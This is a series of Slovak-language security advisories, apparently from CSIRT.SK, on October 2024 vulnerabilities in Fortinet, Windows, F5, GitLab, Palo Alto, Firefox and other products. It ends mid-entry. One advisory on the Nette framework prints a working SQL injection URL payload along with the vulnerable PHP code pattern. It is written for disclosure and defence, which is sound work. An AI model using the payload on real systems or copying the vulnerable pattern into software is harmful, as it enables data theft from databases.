Spoločnosť Fortinet opravila kritickú aktívne zneužívanú zero-day zraniteľnosť v produkte FortiManager. CVE-2024-47575 spočíva v chýbajúcej autentifikácii pre prístup ku rozhraniu API, ktoré umožňuje vykonávanie príkazov, prístup k citlivým údajom a prevzatie kontroly nad FortiManager a v ňom spravovanými zariadeniami.

Zraniteľné systémy:

FortiManager 7.6.0
FortiManager 7.4.0 – 7.4.4
FortiManager 7.2 – 7.2.7
FortiManager 7.0 – 7.0.12
FortiManager 6.4 – 6.4.14
FortiManager 6.2 – 6.2.12
FortiManager Cloud 7.4.1 – 7.4.4
FortiManager Cloud 7.2.1 – 7.2.7
FortiManager Cloud 7.0.1 – 7.0.12
FortiManager Cloud 6.4 všetky verzie

Staršie modely FortiAnalyzer 1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, 3900E, pokiaľ majú povolené „config system global -> set fmg-status enable -> end“ a aspoň jedno rozhranie so službou fgfm.

Opis činnosti:

CVE-2024-47575 (CVSS skóre 9,8)

Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú aktívne zneužívanú zero-day zraniteľnosť v produkte FortiManager. CVE-2024-47575 spočíva v chýbajúcej implementácii mechanizmov autentifikácie bližšie nešpecifikovanej funkcionality API démona fgfmd. Vzdialený neautentifikovaný útočník ju zaslaním špeciálne vytvorených požiadaviek môže zneužiť na injekciu príkazov, vykonanie škodlivého kódu a získanie neoprávneného prístupu k citlivým údajom minimálne v rozsahu konfigurácie zariadenia, IP adries a prihlasovacích údajov k spravovaným zariadeniam. Útočník musí disponovať platným certifikátom ľubovoľného zariadenia Fortinet. To však nepredstavuje väčšiu prekážku.

Spoločnosť už od 13. októbra 2024 používateľov postupne varovala a poskytla aj odporúčania pre dočasnú mitigáciu zraniteľnosti. Podľa spoločnosti Mandiant je zraniteľnosť aktívne zneužívaná minimálne od júna 2024.

Možné škody:

Vzdialené vykonávanie kódu
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia aspoň na:

FortiManager 7.6.1
FortiManager 7.4.5
FortiManager 7.2.8
FortiManager 7.0.13
FortiManager 6.4.15
FortiManager 6.2.13
FortiManager Cloud 7.4.5
FortiManager Cloud 7.2.8
FortiManager Cloud 7.0.13

Ak aktualizácia nie je momentálne možná, výrobca odporúča nastaviť kontrolu pristupujúcich zariadení niekoľkými spôsobmi v závislosti od Vašej zraniteľnej verzie FortiManager, pre verzie 7.0.12, 7.2.0-7.2.7, 7.4.0-7.4.4 a 7.6.0. Môžete tiež obmedziť prístup ku administratívnemu rozhraniu FortiManager z verejných IP adries.

Odporúčame tiež skontrolovať prítomnosť indikátorov kompromitácie, ktorých zoznam zverejnila Fortinet, vo Vašich logoch.

Odkazy:

Potenciálna zraniteľnosť pri používaní frameworku Nette umožňuje SQL injection

Marian Danko — Thu, 24 Oct 2024 11:51:23 +0000

Bezpečnostní analytici CSIRT.SK objavili potenciálnu zraniteľnosť vo webovom frameworku Nette, ktorá pri nesprávnom používaní Nette frameworku umožňuje vykonávať útoky typu SQL injection.

Metóda where($by) v knižnici Database podporuje filtrovanie výsledkov databázovej požiadavky podľa poľa, v ktorom kľúče predstavujú názvy stĺpcov a hodnoty daných kľúčov predstavujú požadované hodnoty. Problematickými môžu byť kľúče párov premenných {“kľúč“:“hodnota“}.

V prípade, že sa do metódy where odošle PHP array v tvare {“SQLi payload“=>“hodnota“}, kde SQLi payload je hodnota zadaná používateľom, daný payload sa vykoná v databáze, čím je možné docieliť získavanie citlivých údajov. Príklad útoku:

:8000/?id%3d1)+UNION+SELECT+2,version()+FROM+test+WHERE+(1=1

Tým sa v Nette Framework vyskladá nasledovná databázová požiadavka:

“SELECT id, name FROM test (WHERE “. $column . ” = ?)”

Po doplnení hodnoty za premennú column dostaneme:

“SELECT id, name FROM test (WHERE “. “id=1) UNION SELECT 2,version() FROM test WHERE (1” . ” = ?)”

A teda finálna parametrizovaná požiadavka na databázu bude vyzerať:

“SELECT id, name FROM test (WHERE id=1) UNION SELECT 2,version() FROM test WHERE (1= ?)”

Zraniteľnosť vo webovej aplikácii môže nastať, pokiaľ programátor využíva knižnicu Nette/Database a ak je v Presenteri použitý kód:

$httpRequest = $this->getHttpRequest();
$filter = $httpRequest->getQuery();
$this->template->terms = $this->testFacade->findBy($filter);

Zároveň Facade používa metódu findBy definovanú nasledovne (preberá hodnotu z funkcie where):

public function findBy(array $by) {
return $this->database->table($this->tableName)->where($by);
}

Možné škody:

Únik citlivých informácií

Odporúčania:

Pokiaľ pri vývoji webovej aplikácie v Nette Framework implementujete danú zraniteľnú funkcionalitu, odporúčame ošetriť používateľské vstupy (resp. kľúč premennej) podľa programátorom zadaného poľa povolených názvov stĺpcov v rámci best practice bezpečného vývoja.

Pre viac informácií môžete kontaktovať CSIRT.SK.

Závažná zraniteľnosť Windows Registry

Marian Danko — Tue, 22 Oct 2024 14:30:47 +0000

Microsoft opravil vysoko závažnú zraniteľnosť vo Windows Registry, ktorá umožňuje eskaláciu oprávnení na serveri na úroveň SYSTEM.
[Aktualizácia 25.10.2024]

Zraniteľné systémy:

Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)

Opis činnosti:

CVE-2024-43532 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť vo Windows Registry, ktorá umožňuje zvýšenie oprávnení na serveri na úroveň SYSTEM. Zraniteľnosť môže zneužiť útočník so sieťovým prístupom ku zraniteľnému zariadeniu tak, že vykoná špeciálne vytvorený skript, ktorý následne vykoná volanie RPC na RPC hostiteľa.

V súčasnosti je dostupný kód pre demonštráciu zneužitia tejto zraniteľnosti od spoločnosti Akamai.

Možné škody:

Eskalácia oprávnení

Odporúčania:

Bezodkladná inštalácia príslušných balíkov opravných aktualizácií podľa zoznamu Microsoft. Zraniteľnosť bola opravené v rámci októbrového balíka Microsoft Patch Tuesday.

Odkazy:

Zraniteľnosti F5 BIG-IP a BIG-IQ

Marian Danko — Mon, 21 Oct 2024 13:39:17 +0000

Spoločnosť F5 vydala bezpečnostné aktualizácie, ktoré opravujú 2 zraniteľnosti v F5 BIG-IP a F5 BIG-IQ. Vzdialený autentifikovaný útočník ich dokáže zneužiť na zvýšenie privilégií, vykonávanie kódu JavaScript a prevzatie kontroly nad zariadením.

Zraniteľné systémy:

BIG-IP (všetky moduly) verzie 17.1.0 až 17.1.1
BIG-IP (všetky moduly) verzie 16.1.0 až 16.1.4
BIG-IP (všetky moduly) verzie 15.1.0 až 15.1.10
BIG-IQ verzie 8.2.0 a staršie

Opis činnosti:

CVE-2024-45844 (CVSSv4 skóre 8,6)

Zraniteľnosť v monitorovacích funkciách BIG-IP umožňuje obchádzať kontrolu prístupov bez ohľadu na nastavenia uzamykania portov. Vzdialený autentifikovaný útočník s oprávneniami úrovne Manager a vyššie by ju mohol zneužiť na eskaláciu privilégií a úpravu konfigurácie zraniteľných systémov. Zneužitie zraniteľnosti vyžaduje prístup útočníka ku Configuration Utility alebo TMOS Shell.

CVE-2024-47139 (CVSSv4 skóre 4,8)

Zraniteľnosť v používateľskom rozhraní BIG-IQ by vzdialený autentifikovaný útočník s oprávneniami úrovne Administrator mohol zneužiť na ukladanie kódu JavaScript a HTML (útoky typu stored XSS) a jeho vykonanie v kontexte prihlásených používateľov. Ak má obeť prístup ku konzole Advanced Shell, môže útočník získať možnosť prevziať kontrolu nad zraniteľným zariadením.

Možné škody:

Eskalácia privilégií
Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia BIG-IP na verziu 17.1.1.4, 16.1.5 alebo 15.1.10.5 a BIG-IQ na 8.3.0 a 8.2.0.1.

Pokiaľ nie je možné zraniteľné zariadenie aktualizovať, dočasne mitigovať zraniteľnosť CVE-2024-45844 môžete obmedzením prístupu ku Configuration Utility a TMOS Shell cez SSH len pre dôveryhodných používateľov/zariadenia a z dôveryhodných sietí.

Pre mitigáciu zraniteľnosti CVE-2024-45844 sa po práci vždy odhláste z používateľského rozhrania BIG-IQ a zatvorte prehliadač. Používajte odlišný prehliadač pre správu F5, ako pre prehliadanie internetu.

Odkazy:

Vysoko závažná zraniteľnosť v produkte VMware HCX

Marian Danko — Fri, 18 Oct 2024 14:02:58 +0000

Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v produkte VMware HCX. CVE-2024-38814 možno prostredníctvom SQL injekcie zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

VMware HCX 4.10.X vo verziách starších ako 4.10.1
VMware HCX 4.9.X vo verziách starších ako 4.9.2
VMware HCX 4.8.X vo verziách starších ako 4.8.3

Opis zraniteľnosti:

CVE-2024-38814 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť s označením CVE-2024-38814 spočíva v nedostatočnom overovaní používateľských vstupov a vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených SQL dopytov mohol zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany útočníka.
Zraniteľnosť odhalili bezpečnostní výskumníci zo spoločnosti Trend Micro Zero Day Initiative (ZDI).

Možné škody:

Vzdialené vykonanie kódu
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu VMware HCX na verziu 4.8.3, 4.9.2 alebo 4.10.1.

Zdroje:

Kritická zraniteľnosť v produkte Trend Micro Cloud Edge

Marian Danko — Fri, 18 Oct 2024 13:53:33 +0000

Spoločnosť Trend Micro vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte Cloud Edge. Zraniteľnosť o označením CVE-2024-48904 možno zneužiť na vzdialené vykonanie škodlivého kódu.

Zraniteľné systémy:

Trend Micro Cloud Edge vo verzii 5.6SP2
Trend Micro Cloud Edge vo verzii 7.0

Opis zraniteľnosti:

CVE-2024-48904 (CVSS skóre 9,8)

Kritická zraniteľnosť s označením CVE-2024-48904 sa nachádza v implementácii REST API, ktoré štandardne počúva na TCP porte 8443 a spočíva v nedostatočnom overovaní používateľských vstupov používaných v rámci systémových volaní. Vzdialený neautentifikovaný útočník by ju prostredníctvom podvrhnutia špeciálne vytvorených príkazov mohol zneužiť na vzdialené vykonanie škodlivého kódu. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie 5.6 SP2 build 3228 alebo 7.0 build 1081.

Zdroje:

Mesačná správa CSIRT.SK – september 2024

Marian Danko — Fri, 11 Oct 2024 12:47:26 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci september 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 09/2024 PDF (1 583 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Kritická zraniteľnosť GitLab umožňuje ľubovoľné spustenie CI/CD pipelinov

Marian Danko — Fri, 11 Oct 2024 12:41:01 +0000

Spoločnosť GitLab vydala aktualizáciu, ktorá opravuje osem zraniteľností. Najzávažnejšie umožňujú vzdialeným útočníkom spustiť CI/CD pipeline na ľubovoľnej vetve repozitára a vykonávať škodlivý kód. Medzi ďalšie závažné zraniteľnosti patrí možnosť realizácie SSRF a XSS útokov, zneprístupnenie služieb a neoprávnený prístup k citlivým údajom.

Zraniteľné systémy:

GitLab Community Edition (CE) staršie ako 17.4.2, 17.3.5, 17.2.9
GitLab Enterprise Edition (EE) staršie ako 17.4.2, 17.3.5, 17.2.9

Opis činnosti:

CVE-2024-9164 (CVSS skóre 9,6)
Kritická zraniteľnosť Gitlab EE CVE-2024-9164 umožňuje vzdialenému útočníkovi spúšťanie CI/CD (Continuous Integration/Continuous Delivery) pipelinov na ľubovoľnej vetve repozitárov a následné vykonanie kódu.

CVE-2024-8970 (CVSS skóre 8,2)
Zraniteľnosť umožňuje za určitých podmienok útočníkovi spustiť pipeline ako iný používateľ.

CVE-2024-8977 (CVSS skóre 8,2)
Zraniteľnosť umožňuje útoky typu SSRF (Server-Side Request Forgery) na inštanciách GitLab EE, ktoré majú nakonfigurovaný a povolený Product Analytics Dashboard.

CVE-2024-9631 (CVSS skóre 7,5)
Táto zraniteľnosť spôsobuje spomalenie pri prezeraní rozdielov (diffs) v požiadavkách na zlúčenie (merge requests), ktoré obsahujú konflikty.

CVE-2024-6530 (skóre CVSS 7,3)
Zraniteľnosť umožňuje vykonať útok typu XSS (cross-site scripting), ktorý vedie k HTML injekcii na OAuth stránke pri autorizácii novej aplikácie.

Možné škody:

Prístup k citlivým informáciám
Vzdialené vykonávanie kódu
Zneprístupnenie služby (DoS)

Odporúčania:

Bezodkladná aktualizácia na verziu 17.2.9, 17.3.5 alebo 17.4.2.

Odkazy:

Microsoft Patch Tuesday opravuje 5 zero-day zraniteľností

Marian Danko — Fri, 11 Oct 2024 12:32:17 +0000

Spoločnosť Microsoft v rámci októbrového Patch Tuesday vydala bezpečnostné aktualizácie svojich produktov, ktoré opravujú 118 zraniteľností, z toho 3 kritické, 5 zero-day a 2 aktívne zneužívané. Zero-day zraniteľnosti umožňujú vzdialené vykonanie kódu, obídenie bezpečnostných prvkov, eskaláciu privilégií a realizáciu útokov falšovaním rôznych prvkov.

Zraniteľné systémy:

.NET 6.0 installed on Linux
.NET 6.0 installed on Mac OS
.NET 6.0 installed on Windows
.NET 8.0 installed on Linux
.NET 8.0 installed on Mac OS
.NET 8.0 installed on Windows
Azure CLIAzure Monitor Agent
Azure Service Connector
Azure Service Fabric 10.0 for Linux
Azure Service Fabric 10.1 for Linux
Azure Service Fabric 9.1 for Linux
Azure Stack HCI 22H2
Azure Stack HCI 23H2
CBL Mariner 2.0 ARM
CBL Mariner 2.0 x64
DeepSpeed
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 AND 4.7.2
Microsoft .NET Framework 3.5 AND 4.8
Microsoft .NET Framework 3.5 AND 4.8.1
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2
Microsoft .NET Framework 4.6/4.6.2
Microsoft .NET Framework 4.8
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Configuration Manager 2303
Microsoft Configuration Manager 2309
Microsoft Configuration Manager 2403
Microsoft Copilot Studio
Microsoft Defender for Endpoint for Linux
Microsoft Edge (Chromium-based)
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Outlook for Android
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Visual Studio 2015 Update 3
Microsoft Visual Studio 2017 version 15.9 (includes 15.0 – 15.8)
Microsoft Visual Studio 2019 version 16.11 (includes 16.0 – 16.10)
Microsoft Visual Studio 2022 version 17.10
Microsoft Visual Studio 2022 version 17.11
Microsoft Visual Studio 2022 version 17.6
Microsoft Visual Studio 2022 version 17.8
Power BI Report Server – May 2024
Remote Desktop client for Windows Desktop
Visual C++ Redistributable Installer
Visual Studio CodeWindows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)

Opis činnosti:

Spoločnosť Microsoft v rámci októbrového Patch Tuesday vydala bezpečnostné aktualizácie svojich produktov, ktoré opravujú 118 zraniteľností, z toho 3 kritické, 5 zero-day a 2 aktívne zneužívané.

CVE-2024-43573 (CVSS skóre 6,5)
Aktívne zneužívaná zero-day zraniteľnosť platformy MSHTML, ktorá umožňuje falšovať isté prvky. Bližšie informácie o tejto chybe Microsoft nezverejnil.

CVE-2024-43572 (CVSS skóre 7,8)
Aktívne zneužívaná zero-day zraniteľnosť Microsoft Management Saved Console, ktorá umožňuje vzdialené vykonávanie kódu prostredníctvom súborov MSC. Oprava tejto chyby zamedzuje otvoreniu MSC súborov z nedôveryhodných zdrojov.

CVE-2024-6197 (CVSS skóre 7,5)
Zero-day zraniteľnosť v knižnici libcurl. Funkcia knižnice utf8asn1str() spracúva reťazce typu ASN.1 UTF-8 spôsobom, ktorý vedie k možnosti prepísania častí pamäte na zásobníku. To môže spôsobiť pád aplikácie. Chyba môže mať potenciál aj pre iné spôsoby zneužitia. Zraniteľnosť môže útočník zneužiť pomocou servera pod svojou kontrolou, ktorý poskytne zraniteľnej inštancii špeciálne upravený TLS certifikát.

CVE-2024-20659 (CVSS skóre 7,1)
Zero-day zraniteľnosť Hyper-V, ktorá umožňuje obchádzať bezpečnostné prvky. Útočník s lokálnym prístupom ku zraniteľnej inštancii na špecifickom hardvéri môže obísť zabezpečenie UEFI a získať kontrolu nad hypervízorom a zabezpečeným jadrom. Potrebuje na to vykonať reštart zadiadenia.

CVE-2024-43583 (CVSS skóre 7,8)
Zero-day zraniteľnosť Winlogon, ktorá umožňuje zvýšenie oprávnení v OS na úroveň SYSTEM. Bližšie informácie o tejto chybe Microsoft nezverejnil.

Ostatné zraniteľnosti možno zneužiť na eskaláciu privilégií, obídenie bezpečnostných prvkov, vzdialené vykonanie kódu, získanie neoprávneného prístupu k citlivým údajom, zneprístupnenie služby a falšovanie rôznych prvkov.

Možné škody:

Vzdialené vykonávanie kódu
Obídenie bezpečnostných prvkov
Únik citlivých informácií
Eskalácia privilégií
Falšovanie prvkov
Nedostupnosť služby (DoS)

Odporúčania:

Bezodkladná aplikácia záplat októbrového balíka Microsoft Patch Tuesday.

Zraniteľnosť CVE-2024-43583 odporúča Microsoft mitigovať povolením oficiálneho Microsoft IME (Input Method Editor). To zabráni zneužitiu potenciálne zraniteľných IME tretích strán.

Odkazy:

Phishingové kampane zneužívajú legitímne služby 500apps.com

Marian Danko — Thu, 10 Oct 2024 13:30:38 +0000

Kybernetickí útočníci stále hľadajú nové spôsoby pre spoľahlivejšie šírenie podvodného a škodlivého obsahu a obídenie jeho detekcie. Okrem ľubovoľných prenajatých domén preto už dlhodobo využívajú pre umiestnenie svojho obsahu tiež legitímne webové služby, ktoré nie je možné prakticky blokovať, pretože ich používajú samotné organizácie, ktoré sa stávajú cieľmi ich útokov.

Čo je služba 500apps.com?

Jedná sa o balík webových služieb a aplikácií pre potreby podnikov a organizácií, ktoré ponúka spoločnosť 500apps. Balík obsahuje aplikácie pre správu procesov oddelení HR, marketingu, predaja, podpory, vývoja, a tiež rôzne kolaboratívne platformy.

Ako ju zneužívajú útočníci?

Útočníci zneužívajú najčastejšie službu forms.io na vytváranie nelegálnych webových formulárov, ktoré zbierajú prihlasovacie údaje a iné citlivé informácie od obetí. Príkladom sú formuláre imitujúce prihlasovacie rozhrania do e-mailových účtov. Formuláre doručujú obetiam formou phishingových e-mailov, častokrát odoslaných z kompromitovanej dôveryhodnej e-mailovej schránky.

Blokovať či neblokovať?

Balík služieb 500apps.com používa množstvo verejných aj súkromných organizácií. Preto nie je praktickým riešením službu plošne blokovať. Ak vo svojej organizácii tento balík nevyužívate a nepredpokladáte, že by ich využívali vaši partneri pri komunikácii s vami, môžete zvážiť blokovanie domény v rámci svojej organizácie.

Pred blokovaním IP adries, na ktorých sú phishingové formuláre hostované, odporúčame preveriť jej majiteľa. Útočníci totiž niekedy zneužívajú IP adresy spoločností ako Google. Môžete tak odrezať prístup pre ďalšie legitímne služby.

Ako sa účinne brániť?

Voči phishingovým kampaniam je najúčinnejšia obrana zvyšovanie povedomia vašich používateľov. Útoky stratia účinnosť, pokiaľ dokážu zamestnanci identifikovať podvodné správy a zneužité služby. Na to slúžia najmä školenia a preventívne phishingové testy, kde sa používatelia naučia na konkrétnych príkladoch a v praxi rozlišovať legitímny a škodlivý obsah (screenshoty, škodlivé odkazy, hlavné rozlišovacie znaky, a podobne).

Odkazy:

https://500apps.com/

Kritické zraniteľnosti Palo Alto Networks Expedition

Marian Danko — Thu, 10 Oct 2024 13:24:14 +0000

Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú viacero zraniteľností v produkte Expedition. Zraniteľnosti možno zneužiť na SQL injekciu, realizáciu XSS útokov, získanie neoprávneného prístupu k citlivým údajom a čítanie a zápis ľubovoľných súborov na súborovom systéme Expedition. Útočníci môžu získať schopnosť vzdialene vykonať škodlivý kód a získať úplnú kontrolu nad firewallmi s operačným systémom PAN-OS. Spoločnosť po aktualizácii odporúča vykonať aj zmenu prihlasovacích údajov a ďalšieho kryptografického materiálu.

Zraniteľné systémy:

Palo Alto Networks Expedition verzie staršie ako 1.2.96

Opis činnosti:

Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú viacero kritických a vysoko závažných zraniteľností v produkte Expedition. Ich zneužitím môže útočník vzdialene vykonať škodlivý kód a získať úplnú kontrolu nad firewallmi s operačným systémom PAN-OS. Pre zraniteľnosť CVE-2024-9464 je dostupný proof-of-concept kód demonštrujúci získanie možnosti vykonávať systémové príkazy na zraniteľnej inštancii bez autentifikácie po zreťazení so staršou CVE-2024-5910, ktorá umožňuje resetovať administrátorské účty.

CVE-2024-9463 (CVSSv4 skóre 9,9)

Neautentifikovaný útočník môže vykonávať systémové príkazy v Expedition s oprávneniami používateľa root. Môže tak získať prihlasovacie údaje, konfiguráciu a API kľúče firewallov s PAN-OS.

CVE-2024-9464 (CVSSv4 skóre 9,3)

Autentifikovaný útočník môže vykonávať systémové príkazy v Expedition s oprávneniami používateľa root. Môže tak získať prihlasovacie údaje, konfiguráciu a API kľúče firewallov s PAN-OS.

CVE-2024-9465 (CVSSv4 skóre 9,2)

Neautentifikovaný útočník môže v systéme Expedition vykonávať útoky typu SQL injection a získavať citlivé informácie z databázy, vrátane používateľských mien, hashov hesiel a API kľúčov a konfigurácie zariadení. Môže tiež čítať a vytvárať ľubovoľné súbory v Expedition.

CVE-2024-9466 (CVSSv4 skóre 8,2)

Autentifikovaný útočník má v systéme Expedition kvôli nezabezpečenému spôsobu ukladanie citlivých údajov prístup k nešifrovaným prihlasovacím údajom a API kľúčom firewallov.

CVE-2024-9467 (CVSSv4 skóre 7,0)

Na prehliadač systému Expedition je možné urobiť útok typu reflected XSS a úspešne vykonať škodlivý kód JavaScript. Útočník môže ukradnúť reláciu prihláseného používateľa. Obeť musí kliknúť na škodlivý odkaz.

Zraniteľnosti objavili výskumníci Zach Hanley z Horizon3.ai a Enrique Castillo z Palo Alto Networks.

Možné škody:

Únik citlivých informácií
Vzdialené vykonávanie kódu
Prevzatie kontroly nad firewallmi

Odporúčania:

Bezodkladná aktualizácia Palo Alto Networks Expedition aspoň na verziu 1.2.96. Spoločnosť po aktualizácii odporúča vykonať aj zmenu prihlasovacích údajov a ďalšieho kryptografického materiálu na Expedition aj firewalle.

Pokiaľ aktualizácia nie je možná, vypnite Expedition alebo obmedzte k nemu prístup na dôveryhodné zdroje.

Overte zneužitie zraniteľnosti CVE-2024-9465 pomocou príkazu mysql -uroot -p -D pandb -e “SELECT * FROM cronjobs; (root predstavuje názov účtu). Záznamy vyhovujúce tomuto dopytu môžu predstavovať dôkaz kompromitácie vášho systému Expedition. Upozorňujeme, že neprítomnosť takýchto záznamov neznamená, že systém nebol kompromitovaný.

Odkazy:

Aktívne zneužívaná RCE zraniteľnosť Firefox

Marian Danko — Thu, 10 Oct 2024 07:19:37 +0000

Spoločnosť Mozilla opravila vo svojom prehliadači kritickú aktívne zneužívanú zraniteľnosť. Jej zneužitím získajú útočníci možnosť vzdialene vykonávať kód.

Zraniteľné systémy:

Firefox verzie staršie ako 131.0.2
Firefox ESR verzie staršie ako 115.16.1 a 128.3.1

Opis činnosti:

CVE-2024-9680 (CVSS skóre 9,8)

Kritická aktívne zneužívaná zero-day zraniteľnosť v rozhraní AnimationTimeline prehliadačov Firefox a Firefox ESR, umožňuje útočníkom vzdialene vykonávať kód. Zraniteľnosť súvisí s možnosťou použitia dealokovaného miesta v pamäti.

AnimationTimeline je súčasťou Firefox Web Animations API a slúži na kontrolu a synchronizáciu animovaných prvkov na webstránkach.

Zraniteľnosť objavil výskumník Damien Schaeffer zo spoločnosti ESET.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia Firefox na verziu 131.0.2 a Firefox ESR na verziu 115.16.1 alebo 128.3.1.

Odkazy:

Kritické a zero-day zraniteľnosti čipov Qualcomm

Marian Danko — Wed, 09 Oct 2024 12:13:48 +0000

Spoločnosť QUALCOMM vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť v službe DSP (Digital Signal Processor) využívanej vo viacerých chipsetoch a kritickú zraniteľnosť v komponente WLAN Resource Manager.

Zraniteľné systémy:

Qualcomm Digital Signal Processor (DSP)
Qualcomm WLAN Resource Manager

Kompletný prehľad zraniteľných chipsetov sa nachádza tu.

Opis činnosti:

Spoločnosť Qualcomm opravila v októbri 2024 20 zraniteľností vo svojich produktoch. Z toho je jedna hodnotená ako kritická, 12 vysoko a 7 stredne závažné. Jednu zraniteľnosť aktívne zneužívajú útočníci pri cielených útokoch.

CVE-2024-43047 (CVSS skóre 7,8)

Aktívne zneužívaná zero-day zraniteľnosť v službe DSP (Digital Signal Processor), ktorú využívajú viaceré chipsety. CVE-2024-43047 spočíva v opätovnom použití uvoľneného miesta v pamäti a lokálny útočník s nízkymi oprávneniami by ju mohol zneužiť na poškodenie pamäte.

Chybu objavil Seth Jenkins z Google Project Zero a Conghui Wang z Amnesty International Security Lab.

CVE-2024-33066 (CVSS skóre 9,8)

Kritická zraniteľnosť WLAN Resource Manager, ktorá bola objavená pred rokom, spočíva v nedostatočnom overovaní vstupov a možno ju zneužiť na poškodenie pamäte.

Možné škody:

Poškodenie pamäte

Odporúčania:

Qualcomm odporúča bezodkladnú aktualizáciu firmvéru (ovládač FASTRPC) zraniteľných chipsetov.

Odkazy:

Zraniteľnosť Apache Avro umožňuje vykonávať kód

Marian Danko — Wed, 09 Oct 2024 12:09:21 +0000

Systém pre serializáciu dát Apache Avro Java SDK kvôli chybe v spracovaní používateľských schém umožňuje útočníkom získať schopnosť vzdialeného vykonávania kódu.

Zraniteľné systémy:

Apache Avro Java SDK verzie staršie ako 1.11.4

Opis činnosti:

CVE-2024-47561 (CVSS skóre 7,3)

